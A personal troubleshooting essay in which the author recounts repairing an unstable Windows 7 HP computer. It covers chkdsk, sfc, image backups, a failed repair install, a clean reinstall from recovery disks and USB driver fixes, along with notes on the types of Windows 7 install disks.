        StartUp Repair I now think runs two utilities: sfc.exe (System file checker) to repair system files (from backup on D drive), and it now told me it was checking and fixing my hard drive, almost for sure running chkdsk c:\ (advising that this could take over an hour). From reading this essay I found that Startup Repair and take 15 to 30 minutes to run (but this may be without the chkdsk utility). After running a while, it told me it was repairing my disk errors, which a detail box reported 'System: volume on disk is corrupt", but later reported it had 'successfully completed', so I presumed fixed it.

Progress?
        I am now getting hopeful Startup Repair had probably run the two most important boot fix utilities available on windows: System file checker to fix key windows files, and chkdsk to fix various hard drive errors. When in 30 min or so Startup Repair told me it was done, and did I want to reboot? Yes, of course, and guess what? The boot failed and again I ended up right back at the blank 'sunrise' screen I had been in an hour earlier! But I have read and now know experience that running repair utilities more than once is sometimes necessary.

My last chance
       With no other options available, back at the sunrise screen 'hang' I just left the PC alone hoping Startup Repair might be running in the background (I now believe it was), and I knew this could easily take 30 min to run. So I went to read a book, and sure enough in 20 min or so the screen began to change, and now having run System Repair utilities twice over the last hour, the system booted normally.

Post boot failure clean up
        Windows7 has two very useful repair utilities: System file checker (sfc /scannow) and Check Disk (chkdsk). The former fixes (replaces) damaged system files (froma cache on d: drive) and the latter fixes hard drive (linking) errors. Running these multiple times can fix errors a single pass misses. Even though they were both run (twice I think) by Windows during the 2 hr boot recovery marathon, my plan was to run them again (once or twice) the next morning.

        Check Disk --- 'chkdsk' is a Microsoft disk utility that has been around since the days of DOS. The Windows version takes 10-15 minutes to run and when run manually it gives running account of progress. It cannot be run when Windows is open, you 'schedule' it to run the next time windows starts. The procedure is this: open a directory, go to 'c' root, right click and select 'Properties. In Properties click 'Tools', under '(disk) Error Checking' select 'Check Now', verify (default) option to  'automatically fix file system errors' is clicked, then click yes to schedule it to run on next start.

        System file checker --- This is tricky to run (see elsewhere in this essay for details), but can be run in about 10 min from within Windows. Briefly it requires opening a Command window (in Accessories) with a right click to 'Run as Administrator'. Then in default dir type 'sfc /scannow'. It provides a running account of the % processed.

        Next day I scheduled a 'chkdsk', powered down and it ran on power up (missed its final message). Then I ran sfc. For the first time System File Checker did not run to completion. It paused at 45% completed, and after a couple of minutes exited with message "Windows Resource Protection' could not perform the requested operation'. First time I have ever seen it do this. I ran it a second time and same thing, stopped and exited at 45%. Still the system is now continuing to boot OK. Later after running the check disk progrram, system file checker ran to 100%, once saying all OK, once saying there was a error it couldn't fix.

Window repair
        There's several repair tools for Windows 7. Two are  built-in and safe and easy to use: 'Chkdsk' scans the hard drive and can repair file links and remove bad disk sectors. 'System file checker' can repair Windows files. It does this using the archive version of Windows on the d:\ drive. Windows files on the c:\drive are compared to the archive Windows files on d:\. How exactly the program does this is not explained by Microsoft. My guess is that it more than a simple file compare, that some sort of hash tag (or what ever the jargon is) is used to assess which version of the file is intact and which is in error.

Driver reinstall (3/25/14 update)
        There's another aspect to Windows that go wrong that I did not appreciate until later. After the reinstall, and especially after I installed Acronis True Image backup software (free with new WD USB hard drive), I had all kinds of problem with Explorer. Directories would stop working, I would see memory usage of Explorer climb to near 90,000, and when powering off Windows would give message it was waiting for Exlorer to respond. Even without these crippling problems responds of the machine was sluggish. System File Checker always reports no problems.

        I found I was able to fix the Exploer/directory problems by reinstalling USB drivers. Saw this recommendation in a Windows fix article. In Device Manager click USB Root Hub, Uninstall. There are six Root Hubs, one I presume for each of my six USB ports. What happens is that in a minute or so Windows on its own reinstalls the driver, popping up the usual box it does when USB drivers are installed. This fixes the explorer problem for a while, but it keeps coming back.

        I suspect the root cause of this Explorer problem is Acronis backup software which I just installed a couple of days ago. Acronis buries itself deep into the system. It has created two virtual drivees that show up in Device Manager. And Acronis does not appear to be working right, it crawls, but it does barely work, and it recovered sucessfully Freecoder program directory from my Windows image backup. I later tried to use it to recover some video files, but only recovered three and while their length looked right, none of them would play. I am trying now to uninstall Acronic, but uninstall appears to hang. I going to try from safe mode.

        A much bigger, more difficult repair is a 'repair install'. This is a replacement of all the Windows files on c:\ and d:\ drives from an archive DVD that can be made by the user from a (free) downloadable complete version of Windows 7 provided (sort of) by Microsoft. On paper this looks attractive as the claim is it can replace all your Windows files while leaving your desktop, programs, and data files untouched (some drivers may get lost and need to be reinstalled). While on paper this looks attractive, however, it does take a lot of hours, my one experience with it was not good. The repair install hung half way through leaving me with a totally mangled OS.

'chkdsk' and 'sfc /scannow'
       To try and stabilize my system I did two things. One, I uninstalled a few programs that I could see were running a lot of background programs (Skype) or were annoying and no longer seemed useful (Malwarebytes). Two, I repeatedly ran Windows two key (safe) self repair programs: 'chkdsk' and 'sfc /scannow'.  'Chkdsk' first on 'c' and 'd' drives, then 'sfc /scannow'. I believe these are the two programs that Windows repair disk program 'Repair Windows' calls, and I believe they are safe to run at any time.

                           chkdsk                        check disk and repair and recover bad sectors
                            sfc /scannow              check replace damaged system files using 'd' drive system file archive

        'Chkdsk' (check disk) checks the disk files and importantly can do some some recovery and repair of bad disk segments. This program has been around since DOS days. It can check the (small) 'd' drive in a few minutes, but a full check of the 'c' drive (click ,'scan for bad sectors' box) takes several hours. I first ran this during the day where I could monitor what files it was fixing. I found a half dozen files with bad sectors. Running it at night leaves no fix info on screen. I don't know if it is logged, but it probably is.

Access 'chkdsk'
         (preferred) In directory right click 'c' or 'd' drive, Properties, Tools, Check disk for Errors. For the 'c' drive it will respond it cannot check the disk with Windows running, but suggests you schedule a disk check on the next power up.

         (alternate) I read chkdsk can also be run from the Command Prompt (as administrator). I have not run it this way, but I verfied 'chkdsk /?' works with the default directory. (For c: drive it should respond with (y/n) to schedule it to run on nect powerup.)

                        chkdsk  /f  /r  c:                                      /f is fix error,   /r is locate bad sectors and recover information

Access 'sfc /scannow'
        From within Windows, Start, Accessories, Command Prompt (right click Command Prompt and choose ' Run as Administrator' (important). In the default directory just type 'sfc /scannow' (enter). (note space)

More advanced Windows7 repair tools
        It looks like the best place to find indepth repair tools is YouTube. The videos can walk through a lot of detail steps a lot quicker than written text. I only did a quick look on YouTube, but I found more utilities. One is boot repair utility, you can do something called re-registering your DLLs, the last and most difficult and most capable is a reinstall of Windows that doesn't wipe your disk.

Msconfig
        Type Msconfig in search box. A video on advanced trouble shooting points out this provides a lot of safe boot choices (logging, etc) that can be used to diagnose boot and startup problem.

Pure Leads
        I took a quick look and found something called 'PureLeads' that starts at boot up that I don't rememeber and smells like some sort of advertising crap. (has a bunch of .exe files all dated seven weeks ago, 1/23/14) Sure enough a google search shows this to be adware, and from the date it showed up it might be responsible for the strange slow down I find at boot. I just uninstalled it, check to see if it stays uninstalled.

 Does 'Upgrade' function as 'repair'?
      From the screen below you can see what the video calls a 'repair' re-install Microsoft seems to have included this Windows installation option to allow users to 'upgrade' Windows. Does it really do what the video claims? I suspect it probably does, but there are three underlying assumptions:

                1) Allows the same version of windows to be re-installed (with online updates)
                                    (This is what the video claims to show.)
                2) Replaces all Windows files
                3) Replaces the d:\drive archive version of Windows

Upgrade/repair Windows disks
        There are two basic types of Windows disk: recover and install. The former can be created by the computer and only provides access to recover and repair tools. It does not have the full Windows on it, hence cannot be used to install or repair. I am beginning to suspect that all Windows installation disks have an upgrade option, which can be used for repair, even if the say the opposite! Install disks can come with or without keys, they can be resticted to just one computer or a specific computer. The set I bought from HP ($12) is for just my HP model (with no key), but my old key should work.

        ** $95 Windows 7 Home Premium install DVD with SP1 (with key) sold by Amazon (plain wrapper) linked from above site, that say they are only for installing on blank drives (users who built their own computers buy it), however they have many other uses. Upgrade from Vista (preserving programs said reviewer). Few people buy them just to get a Windows key (to activate the xxxx.iso DVD install) and don't use the disks. Several reviewers report using this Windows 7 DVD to erase Windows 8 and replace it with Window 7.

        This later use is very interesting. With this DVD in hand in the future you should be able to buy any Windows 8 computer retail and pop in this DVD. At boot it will not only replace Windows 8 with Windows 7, but it will (in a stroke) eliminate all the crap software that infects all retail computers. While as of March 2014 you can still buy computers with Windows 7 installed, this is going to stop at some point. Microsoft has announced sale of Windows 7 computers would cease in fall 2014 (two years since Windows 8 come out), but has now retracted that date and there is no firm date. Still at this time getting a new computer with Window 7 from a manuf is getting hard. First, you probably need to order a new computer online as you are unlikely to find a Windows 7 computer in stores. Two hardware choice for some reason is limited. I checked the HP site. I expected that Windows 7 would be an option on any computer sold, but its not. Three computers are offered with Windows 7 (only) and all the others, including the cheapest are only sold with Windows 8.

    http://www.youtube.com/watch?v=RC_5eb9wTfk               'Repair Install to Fix Windows 7 Without Reformatting by Britec'
    http://www.sevenforums.com/tutorials/3413-repair-install.html
    http://www.heidoc.net/joomla/technology-science/microsoft/14-windows-7-direct-download-links#
    http://windows.microsoft.com/en-us/windows/installing-reinstalling-windows#1TC=windows-7
    http://windows.microsoft.com/en-us/windows/installing-reinstalling-windows#1TC=windows-7       official Window Upgrade install info

         http://www.amazon.com/Windows-Premium-System-Builder-Packaging/dp/B00H09BB16/ref=pd_cp_sw_0
http://www.amazon.com/gp/product/B004Q0PT3I/ref=as_li_tf_tl?ie=UTF8&camp=211189&creative=373489&creativeASIN=B004Q0PT3I&link_code=as3&tag=thestartrekmidip

        The tricky thing I see from the video is Sevice Packs. If you have Service Pack 1 installed then the code on the CDs probably won't match what's on the computer. A potential big problem, but the video does show you exactly how to find and uninstall the Service pack, so it is doable. (Using the video below as a guide I do not have Service Pack 1 installed. I have windows auto upgrade turned off). So there's another up grade I could do, but it would complicate (probably) a recovery with the disks I have. As part of the install, he selects go online to update, so it may very well be that the repair install will include Service Pack #1.

        By going to User Accounts (type 'user' in Start search box) I found out that I am the admistrator of my computer.This is shown by a big sunflower box upper right on the User Accounts page with text "(my name), Administrator". Below is how to log into Windows as administrator (required for upgrade/repair install)
                 right click Command Prompt: Run as administrator
                 type:    net user administrator /active:yes                                                      activate
                             net user administrator /active:no                                                       de-activate

There are several YouTube videos on this. I like this one which goes through the process step by step:

         http://www.youtube.com/watch?v=RC_5eb9wTfk               'Repair Install to Fix Windows 7 Without Reformatting by Britec'

        Here's the key Windows 7 screen from the video above, select 'Upgrade'. Note this option says explictly says you can keep your "files, setting and programs"!

Image backup file
        Before he starts he makes an (image) backup (crucial in case the install fails) to an external drive. Types 'backup' in Start search window and selects program 'Backup and Restore', on this window click 'Create a System Image'. From the little I know an image backup is apparently a copy of all your data and programs (with setting) on the disk (you need as much space on USB drive free as you have on the computer's hard drive as my test shows virtually no compression!), so (apparently) Restore can then take this file and expand it putting you machine exactly back to where it was when the image was made (in other words everything saved since then will be erased).

        -- System image is not only useful for a (complete) backup, but it be used to move everything to a new hard drive (which needs to be same size or bigger than original drive)

        -- Re-imaging a disk drive takes minutes compared to hours to reinsal Windows.

        -- "system image can be several gigabytes or more"  This is a joke... these files are huge!

Image file(s) are huge!
        It takes 10-15 min for the system image program to setup and check disk space on external drives. It tells you how much disk space you need before you start. There is for all practical purposes no compression!! I need 671 Gbytes free. You have three save options: c: (system) 661 Gbyes, d: (HP_Recovery) 10 Gbyes, and 'System' (30 Gbytes), but for an image to back up the drive seems pretty obvious you need to save everything. (I do in fact have room, because both my 2 Tbytes USB drives have 1.2 Tbyte free (about twice what is needed.)

Doing an image backup
        After gaining a little understanding about image files, having plenty of space on my 2Tbyte USB drives, I decided to make an image of my (whole) hard drive. This is the c:\ drive and Windows archive d:\ drive, which means selecting all three choices: (user) programs + data, system and system backup. (Correction, all three options are checked by default and cannot be unchecked, in other words the only choice is to image the whole drive) My understanding it this is a 100% copy of the entire drive (at least every sector in use), and an image restore will just copy it back (is rest of drive wiped??).

        This image backup is not of a clean stable Windows setup, because I am still having occasional blue screen crashes, though I have been booting reliably for last few days. But if I suddently find I can't boot, it would be very useful because it would allow me to get access to my programs. The procedure for this is to boot from Windows recovery disk and select Image restore.

            c:\ drive                              Windows + program + data                      703 Gbyres       (714 (655) Gbyres total hard drive used)
                d:\ drive                              Windows archive backup                           11 Gbyres
                USB 2 Tbyte drive              1.19 Tbytes free (prior)
                                                            565 Gbyte free (post)                               625 Gbyes image disk space = (1,190 - 565)
                USB directory                     WindowsImageBackup                             Properties: size: 653 GBytes, Read Only
                Image files                           xxxxxxxx.vhd     (41 Gbytes)                    'vhd' = virtual hard drive
                                                            xxxxxyyy.vhd     (685 Gbytes)

        Yup, (virtually) no compression!  (The option to image backup to DVD's is a joke with modern high capacity drives.) You need free space on your USB drive that exceeds the space used on your local hard drive. (I inquired about doing a 2nd image backup to the same USB drive and am told there is not enough space, and this is before I get to choose what to back up!). Don't know how long the backup took because I did it overnight, but I presume it was hours.

        I read in a forum you can look at the contests of the .vhd backup files, so I right click Open and Windows tells me it doesn't know what program to use to open a file it just wrote! (More Windows stupidity or lying.) I googled how to view the contents and followed instructions in Computer Management, Disk Management to 'Attach VHD'. What it did was make an L: (tiny 36 Mbytes, system) and (M: 655 Gbyres, OS) drives that I can open with explorer to see directories, but generally cannot access files. (I don't like this because I don't really understand what these drives are (they do not indicate anywhere they are the .vhd file contents!).

Don't like what I see
        The directory listings I see in the 'vhd attached' m:\ drive worry me. It is only a partial listing and the directory with most of my personal files (Speed) is missing. Also where as most directories cannot be opened a few can and files can be accessed, for example 'Comcast download of my corrupted homepage.' The program Turbo Tax even runs (and opens my return) on the m:\ drive. This is all very strange and not reassuring that if I ever need to use this image file as a backup that everything is there.

Bootrec.exe
        This is very specialized and looks like it should only be used by experts. It will repair boot sectors on Window7. Below is a Microsoft tutorial showing how to run it.  They suggest you run this after running 'Repair Computer'. Basically it's run from Command Prompt option that you select from the recovery CD. It only seems to do one thing:  it fixes a damaged boot sector by writing a new one.

         http://support.microsoft.com/kb/927392                                         Microsoft tutorial on how to use Bootrec.exe
         http://www.youtube.com/watch?v=RC_5eb9wTfk                                Bootrec.exe tool ---- boot fix (for Vista!)

Windows reinstall and disk options (3/14)
        I tried all three Windows 7 repair tools to try and fix my unstable system, the two safe ones: disk repair (chkdsk), Windows file fix using d:\ archive (sfc /scannow), and the more difficult and risky repair approach: 'Windows repair install' using a DVD made from downloaded (Microsoft) Windows 7 .iso file.

        After repeated use of the first two (safe) repair tools failed to fix Windows, I proceeded on to the repair install. I made an image backup of my whole 750 Gbyte drive (90% full) saved to a USB drive, downloaded the (free) Windows 7 .iso file, downloaded and installed (free) PowerISO and used it to make repair install DVD, took 3 trys to get an error free write of the 3.2 Gbyte file to the DVD. And all this got me nowhere, the repair install hung halfway through (during a restart) leaving me with a scrambled hard drive. I tried to go back, but Windows Image restore was unable to find the USB drive (unbelievable!) leaving me with no option but to pull out my HP recovery disks and do a clean install of Window 7, meaning a disk wipe, irenstall of Windows 7 in c:\ and d:\ archive plus all the crap software that HP loads onto its retail computers.

        In a clean install all my programs and much of my data was lost. I did have file copies of my most critical data saved on a USB drive. As it happens I have long had two USB drives, so had a 2nd external backup, but during this few weeks disk check utilities reported my 2nd USB drive had serious problems. I reformatted it, but it still had errors (it's toast, won't spin up properly). While I have ordered a replacement USB drive, it is not here yet, so for now my file backup is pretty thin with much of my data stored only on a single external hard drive.

** Types of Windows 7 disks
        The world of Window 7 repair/recover/install disks is confusing zoo. This is a combination of two things, Microsoft puts in all kinds of restriction on disk use to maximize the dollars they can extract from the world, and much worse their description of the disks is very poor and confusing. They never detail what the disks do, how they differ from other disks, and what restrictions there are on their use.. Also Microsoft is not above lying here, for example the disks for repair install Microsoft always calls  'upgrade' disks, but there is no upgrade when you put back the original OS. With a lot of digging I figured out the basics of world of Windows 7 install and recovery disks.

        1) Recover disk, which typically a user has his own computer write (though they can be bought on Amazon for $15 or so). Very useful disk and (nearly) free, but it only provides access to Windows repair tools and Windows image restore. It does not contain the Windows OS, so obviously it can not be used to reinstall the OS.

        2a) Recovery disks bought (see below) from computer manuf, in my case a set of five CD disks bought from HP.  Like most computers bought retail (Staples) my HP computer came with no disks, but I found out two years ago (from Staples repair techs) that you can buy a set of disks from HP that can re-install the entire Windows 7 OS on your computer. In effect you can buy the disks HP should have thrown in, but doesn't. This is a cheap way to buy a set of Windows disks, I paid $12 (+ $5 shipping) ordered online from HP support. Initially Staples was going to sell me the exact same disks for about $50! The big limitation of these cheap Windows disks is that (at least those from HP) is that they can only be used to put Windows back on the exact model number HP computer you buy them for. In other words you have to order Windows recovery disks for HP model xxxx, the model you own, and (almost for sure) the disks check the hardware and will only run on that model. These disks also put back all the bloat software (Norton, games, etc) that HP had installed on the computer when it was new and uninstalling all this crap takes hours (and involves some risk).

            Description: cheap set of disks that can install entire Windows 7 OS (plus HP bloat software) bought from computer manuf
            Limitations:
                            -- Can only be used on boot
                            -- Always wipes the entire drive
                            -- Only will install on a particular model HP computer (specified at disk purchase). No Window key needed.

        2b) (update 3/18/14) Burn a set of (full) recovery DVDs.  On the HP site I was surprised to find an alternate (or replacement) way to get a (full) set of Recovery disks. I bought my recovery CDs online in 2012, but looking at the HP site recently it says HP Windows 7 computers can write (one time) their own full set of recovery DVDs, see 'Recovery Disk Creation'. This is not just the single recovery disk that provides access to recovery tools. This set of DVDs (typically three) can be used to restore even a corrupted hard drive, so this is the entire OS (plus bloat software), and while it doesn't say so it must run at boot. Almost for sure these homemade burned disks are the same as what HP sells. As with the purchased disks they can only be used to reinstall the OS on one specific computer model which, of course, is the model on which they are burned. Clearly the PC needs to be in good health when they are created, at a minimum the d:\partition must be uncorrupted and the PC stable enough to do the burning.

Totally confusing names and poor descriptions
        The horrible confusion of Windows backup and installation disks is evident on the HP support site. It is as clear as mud what the difference is between the (short) Recovery disk, which you burn (or buy) that just provides access to Windows repair tools and image backup, and a (full) set of Recovery DVDs that you either burn (or buy) that can install the whole OS on a corrupted (or new) blank drive (in same computer). They are both called Recovery disks. Gees!

            Description: (nearly) free set of disks that can install entire Windows 7 OS (plus HP bloat software) burned by PC (when it is healthy)
            Burn with HP 'Recovery Disk Creation' program: Start, All Programs, Recovery Manager, Recovery Disk Creation
            Limitations:
                            -- Three DVD+Rs needed (30 min burn time/DVD when computer healthy)
                            -- Can only be used on boot
                            -- Always wipes the entire drive
                            -- Only will install on a particular model HP computer (model which burns the DVDs). No Window key needed.

Here's an HP video explaining how to have the computer write out its own full set of recover DVDs: 'Welcome to Recover Media Creation'

         http://h10025.www1.hp.com/ewfrf/wc/document?docname=c01867124&lc=en&cc=us&dlc=en&product=5399832

       Looking around on the HP site so far I haven't found out how to buy a set of recovery disks. Is it possible they don't sell them any more and the only source of these full recovery disks is to burn them yourself? The video says contact HP if you need to buy the disks, but if they sell them they don't make it easy to find the support page.

        3) Microsoft makes available free online the entire Windows 7 OS (even upgraded with SP1) in the form of a single 3.2 Gbyte file. This option is not very well known (at least I had never heard of it) The file is xxxx.iso format, which I have seen described as sort of raw DVD format, which can be burned to a (single) 4.8 Gbyte DVD. It takes a special program to do this. I used PowerISO (free), and it is a relatively simple procedure except it took three trys to get a disk with no bad bytes, so three of my blank DVD's got used up.

        At first when I learned about this free OS file it made no sense to me. Why would Microsoft be giving away the Windows 7 OS, which is still for sale on Amazon for $100? The answer is that this disk will not run at boot (I verified this). It can only be run from within Windows, and it needs a Microsoft key (not supplied)  to activate it, so it cannot be used to put Windows on a new (blank) hard drive. It's intended to allow Windows users to install an 'upgrade' version of windows (if you have a key presumably), and (not made clear by Microsoft) is that it can also reinstall the same operation system, which in the YouTube world is called a 'repair install'. In this case you reuse the Microsoft key on the side of the computer (or it can be extracted by a tool called Keyfinder, from Magical Jellybean). A repair install disk has two options (see attached screen capture), it can either first wipe the disk or this step can be skipped preserving your programs and data.

            Description: free, download file, burn to DVD with entire OS using your built-in DVD drive
            Limitations:
                            -- Can only be run from Windows desktop (will not run at boot)
                            -- Needs a Windows key to activate it (not a problem for a repair install as original Windows key an be reused)

        4) OEM windows. Amazon is selling Windows 7 OS for $98, full OS on (single) DVD (with SP1) supplied with a Windows key. The target customer is people building their own computer system. Amazon reviewers call this OEM windows. It will install Windows 7 on any blank hard drive. Reviewers say it then becomes 'locked to the hardware'. Presumably what this means is that it can only be used one time to install to any blank hard drive, and from that point on it will only reinstall to that motherboard, becoming locked to it the same way the HP recovery disks are. In effect after one install (to a blank hard drive) it becomes the recovery disks for that one computer.

Window 7 insurance
       ** Investing $100 now to buy this Window 7 OEM DVD (while it is still available) may be good insurance to keep using Windows 7 in future. It allows you to buy a retail Windows 8 computer, pop in the DVD and power up, and Windows 8 with all the bloat software installed by the vendor will be gone replaced by a bloat-free version of Windows7! (confirmed by several Amazon reviewer who have done this). People are reporting boot times with this DVD of 3 to 7 seconds! Of course you also may be missing a couple of useful (and necessary) utilities, like DVD write software, but I bet these utilities can be downloaded.

Try Windows 8 first
       A purchase of a Windows 8 machine with a backup Window 7 OEM DVD allows you to try out Windows 8. Like it, keep it, don't like it pop in the Windows 7 OEM DVD. Since new machines typically come with more ram and USB 3, Windows 7 should run better than older hardware. I checked to see if Windows 7 is compatible with USB and replies from 2011 were it had no native USB 3.0 support, but USB drivers could be installed and work fine.

Warning on Windows 8 => Windows 7
        This article from PC mag walks through replacing Windows 8 and shows its not so simple, especially for a laptop. It identifies three problems. The biggest seems to be Windows 7 drivers. New hardware will need Windows 7 drivers, which need to be tracked down and might not exist. The article advises preparing a memory stick with drivers with the install OS disk. Another tricky problem is bios. A Windows 8 machine is likely to have a new UEFI bios. They show going into Windows 8 to switch the bios back to 'legacy bios' needed to get Windows 7 disk to boot. A still further complication is that in the install process you need to clean out hard disk partitions of Windows 8 by separately formating each and then combining the free space. After reading this article, buying a new Windows 7 machine looks a lot easier, the problem being they could disappear by the fall of 2014.

         http://www.pcmag.com/article2/0,2817,2417361,00.asp

        This game can be extended. I verified that Window 8, like Windows 7, can write (full) recovery media (to DVD or memory stick), so if Windows 7 does not work out, pop in the Windows 8 media and reinstall it. I looked up Microsoft documentation online to verify that Windows 8 could write full recovery media, and (surprise!) the official Microsoft documentation is vague and confusing on what the disks do. Nowhere does it say the disk 'reinstall' Windows 8, it says the disks 'refresh' and 'reset' Windows 8. It is, however, clear that it writes the full OS because as part of the process, it asks you if you want to delete the d:\ partition (to free up disk space).

        And I guess the process can be done in reverse too (at least for a while). Buy a retail machine with Windows 7 and a retail or OEM copy of Windows 8 ($100 to $110). I was surprised that at my local Staples in Mar 2014 a year and a half after the release of Windows 8 two of the six desktops on display came with Windows 7.

        5) Retail Windows. Not sure exactly how (or if) this is different from OEM disks. It may just be that the only real difference is that retail Windows comes with customer support from Microsoft., whereas when you buy a computer from say HP, they are expected to provide the support. Windows 7 retail disks are no longer for sale, Microsoft apparently enforces this. Amazon puts up a banner to this effect, and you cannot even find it on Ebay, which talks of Microsoft restrictions. The reason it is no longer for sale is that Microsoft is gradually closing the door on Windows 7 to force users to Windows 8.
---------------------------------------------------------------------
My 'repair install' advanture (3/14)
       I had spent mucho hours over many days trying to repair Windows and was getting pretty fed up, so I popped in the DVD I made from the .iso file and began a repair install (following the YouTube repair install process). I didn't do more backups of my files (a mistake!) thinking if needed I could always reverse the disk wipe. The homemade DVD worked OK and the install went along fine until (as part of the process) it did a restart, and there it hung (even though my unstable Windows had been booting reliably lately). Now I had a half installed set of windows files.

        Ok, image restore to the rescue, this is why I made the image backup file a few days earlier.  It is supposedly a copy of the whole disk (maybe just the c:\ partition) containing not only Windows files, but all user programs and data. So I put in my recovery disk to access the image backup and guess what, freaking Microsoft image restore can't find my USB drive which has the backup file, even though I only have one USB drive connected and only one image backup on the external drive. When I pull out my tablet and research this, I see this is s common complaint, the drive with the backup file can't be found. Apparently image backup and restore is another poorly written Microsoft utility that if you don't do a kabucki dance beforehand and know all the secret tricks it won't run.

        On YouTube a repair install looked pretty sweet, replace Windows files while keeping your programs desktop and data, but in practice I found it is a different story. Trying to run this install on a shaky version of windows is apparently very risky.

Missing 'trick' for USB image restore? (update 4/2/14)
       Maybe the images below show the missing 'trick' needed to make a Windows image restore from an image on a USB drive work. My image restore failed when (stupid) Windows could not find the USB drive where the image was stored, thus forcing on me a month of drudge work to reinstall everything. I see USB drive not found drive is a common complaint, on the other hand I see articles where authors say Windows image and restore, while not fancy, is solid. If the latter is true, there has to be some 'trap' to avoid, or non-obvious 'trick', to make it work. (Pros who know how to a complex procedure works often do not realized that there are traps to warn about or tricks to explain.)

        As I read between the line below, it looks like the 'trick', or if you will the waiting 'trap' to avoid, involves either when the USB drive should be connected and/or hitting refresh at the right point to get it recognized. Their recipe, which presumably works, is to start the the recovery process with the USB drive not connected. They connect the USB drive only when the 'select a system image' screen (left below) comes up, and they are pretty clear about this! In the next screen (right below) they hit refresh to get it recognized.

        Like all recipes it's not clear what happens if you deviate from it, but it might very well be that the process is delicate and these two steps need to be done just this way to get the USB drive recognized. (Sound like Microsoft to me!) I know I didn't do it this way. I started the recovery process with the USB drive already connected, which seems totally logical to me. I don't remember if I hit refresh.

. 
(source -- http://oakdome.com/k5/tutorials/windows-7-disk-imaging/restore-windows-7-from-backup.php)

I do a clean install with HP recover disks
        Now with a scrambled hard drive and image restore not working I had no choice but to do a clean install. I verified that the homemade DVD would not do this, System Recovery option is grayed out. So I pulled out my HP recover disks. They start at boot, do a disk wipe and put the OS back on, (plus of course all the crap software that HP loads onto its retail machines). These disks ran OK (tedious since you need to hand feed them), but I ended up with Windows like when I first bought the computer. First thing I made another effort to run image restore, this time from within stable Windows. I figured now there should be no problem finding the USB drive, after all it was showing up in Explorer, I could see the image file there. Think again! Even from within Windows with explorer seeing the USB drive the image recovery program can't see it! Go figure, incompetent Microsoft in action. It occurred to me that I might have one more byte of the apple, that later some recovery of my data files might be possible if I could find a utility that  could pry open Windows image file that was still sitting on my USB drive.

        Now came the 'fun' 20-30 hour several day job of de-crapify the computer of HP bloat and recovering and setting up all my old programs. I was guided by a screen shot of my desktop I recently took of my unstable computer using the camera in my (blackberry) tablet. I wish I had taken more photos like a picture of my toolbar customization of Opera browser, where I had added a lot of custom buttons. Some pictures of explorer file listing would have been useful, like the startup directory. But before I started working on the programs, I decided to update Windows. I had been through this process a few day earlier, because before I could run the repair install (with built-in SP1), I had to upgrade my shaky OS to SP1, so I knew it was many hours. Windows told me it had like a 100 critical updates and only after all these were installed did it bring up SP1 and it was installed. (A couple of days later it is telling me it has found about 50 more updates to install, all critical of course.) I was careful running sfc (no errors), chkdsk, and at the end defragging the disk (it normally runs auto on a monthly schedule).

Recovery time update
        Yea, a few days to get back 80%, so you are online, email works, the printer works. This is relatively easy stuff where the programs can be downloaded or pulled from disk and critically where the programs don't require too much set up. I made my image backup on Mar 8 and it is now March 25 and I am still only about 80% recovered.

        My recovery is long and hard, because I don't have a vanilla machine. I have a lot of hardware and custom software on my machine including TV tuner, USB scanner, two 2 Tbyte USB drives, wireless printer/scanner combo. The TV tuner that allows the watching of TV live and records TV programs to disk. It takes some time to rescan channels and set them in the order I like, but at least this is straightforward, I have done it many times before, so I know just what to do. The Cannon wired/wireless printer/scanner MX452 was a bitch to install when it was new, and was a bitch to reinstall.

        During this backup effort running hardware checks I found one of my two WD 2 Tbyte drives was failing, so I bought a new WD 2 Tbyte drive, and spent mucho hours cleaning up the files on the good 2 Tbyte backup drive to speed copying them to the new 2 Tbyte drive. Even with this prep work it took three overnight sessions (10+ hours) to copy 600 Gybes from one USB drive to the other.

        The new WD 'My book' 2 Tbyte USB drive came with a free (lite) version of Acronis (True Image) backup software. Installing Acronis totally crashed my machine installing it (or so I thought), and I had to resort to System Restore to regain control. It installed 2nd time, but does not run normally, it just crawls, but still I found it has a use. Even crawling it is able to open the 600 Gbyte Windows disk image file that I made on Mar 8 before the new install, and unlike Windows, Acronis can extract files from this image backup! I pulled out the Freecorder (4 or 5) program directory, no longer available for download, and amazingly it runs. Freecorder 5 (or 4?) had been my workhorse program for capturing streaming video. It's an example of a highly customized program. When I originally got it, it provided video capture only as a toolbar in some browser. Playing with its .exe files I had figured out how to run it stand alone from the desktop and set it up (somehow) to capture Opera downloaded video. As recovered with Acronis, it is only capturing IE video, but I will see if I can fix this.

        I use the (old) Opera browser because it can be so highly customized and has built-in email. I have it customized with a bunch of custom buttons all of which I have to search out again and reinstalled. (The button that with one click turns javascript on/off is extremely useful to get around paywalls.) In the crash I lost all my Opea bookmarks, my email contact list, and my custom skin. At least I can build my contact list up by opening old emails stored on my server, but my bookmark list is gone, and custom skins are not supported on Opera version 12 I installed.

        I had keyboard control of sound, which I found very useful. This
Let me list the remaining issues:

Boot is not normal
        When my desktop appears some programs run, and for many, many minutes (up to 15 minutes!) some don't run. When I click on these, there is the whirring wait cursor for a few seconds and then nothing happens, no cursor the program does not start. Yet when I check Device Manager, I see the process has started. I had this problem before the clean install, and if anything it is now worse. I have no idea what's going on. I keep looking at processing running, especially update services, and shutting them down, but no joy. During this extended wait time there will often be a couple of USB like system low frequency tones, but what they indicate I have no idea. Chrome usually starts immediately, but browser Opera will not, System Restore will not. I can open and work with local files.

        I have devised a test. Click on System Restore. When its screen (finally) pops up, I know the boot sequence is finally done, and everything will run normally. I need some sort of boot tracking program, but this will probably be very techy and a huge time burner. I know there is a list of boot process in Windows, but no times attached and I don't seen anything. Another test I should do is pull off all my USB devices and time the boot as I add them back one by one.

Progress --- drivers (Update 3/27/14))
        I now think the strange, minutes of delay it takes after my desktop appears for things to start up normally is related to drivers, probably USB drivers. I have been able to get very snappy performance, which unfortunately doesn't hold, by 'Unstalling' driver (USB and I think Disk drive driver) and letting Windows reinstall them. I had seen it recommended to Uninstall drivers to fix them. What I find happens is that after Uninstall just wait, Windows on its own will reinstall them.

* Windows driver reinstall --- Can take 5 to 10 minutes and need to turn on 2nd screen to see what is happening.

'Advanced USB Port Monitor' utility
    I got a (free trial) utility to monitor USB ports: 'Advanced USB Port Monitor' from AGG Software. This helped a little and shows there was some flakiness with card reader (USB) port. This port would flip back and forth in names and between not working (red) to working. The strange noises I had been hearing during the delay are USB type sounds. It shows which USB devices are on which USB ports, and this allowed to map my USB ports physically. It is able to monitor port activity, but I didn't really explore that.

USB port mapping
